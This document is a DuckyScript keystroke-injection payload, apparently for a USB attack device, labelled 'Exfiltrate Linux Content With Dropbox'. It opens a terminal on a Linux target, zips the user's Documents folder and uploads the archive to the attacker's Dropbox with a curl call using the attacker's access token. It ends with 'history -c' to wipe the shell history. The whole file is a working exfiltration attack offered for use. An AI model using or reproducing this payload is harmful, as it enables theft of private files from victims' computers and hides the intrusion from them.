* ##########################################################
* #                                                        |
* # Title        : Exfiltrate Linux Content With Dropbox   |
* # Author       : Aleff                                   |
* # Version      : 1.0                                     |
* # Category     : Exfiltration                            |
* # Target       : Linux                                   |
* #                                                        |
* ##########################################################

* Requirements:
*     - Internet Connection
*     - Dropbox Account
*     - - DROPBOX_ACCESS_TOKEN


DELAY 1000
CTRL-ALT t

DELAY 2000
* Required: Set here your Dropbox access TOKEN
STRING ACCESS_TOKEN="TOKEN"
ENTER

DELAY 500
STRING USER_NAME=$(whoami)
ENTER

DELAY 500
STRING path="/home/$USER_NAME/Documents"
ENTER

DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER

DELAY 500
STRING NAME="$RANDOM.zip"
ENTER

DELAY 500
STRING ZIP_PATH="$path/$NAME"
ENTER

DELAY 500
* The FOLDER that you want to zip, in this example you want to zip all Documents content
STRING FOLDER="/home/$USER_NAME/Documents/"
ENTER

* Delay for zipping operation, it depends by computer power and folder directory
DELAY 10000

DELAY 500
STRING if [ -r "$FOLDER" ]; then
ENTER
STRING zip -r "$ZIP_PATH" "$FOLDER" > /dev/null 2>&1
ENTER
STRING else
ENTER
STRING echo   ""
ENTER
STRING fi
ENTER

DELAY 500
STRING DROPBOX_FOLDER="/$NAME"
ENTER


DELAY 500
* DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
STRING curl -X POST DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
ENTER

DELAY 2000
STRING history -c
ENTER
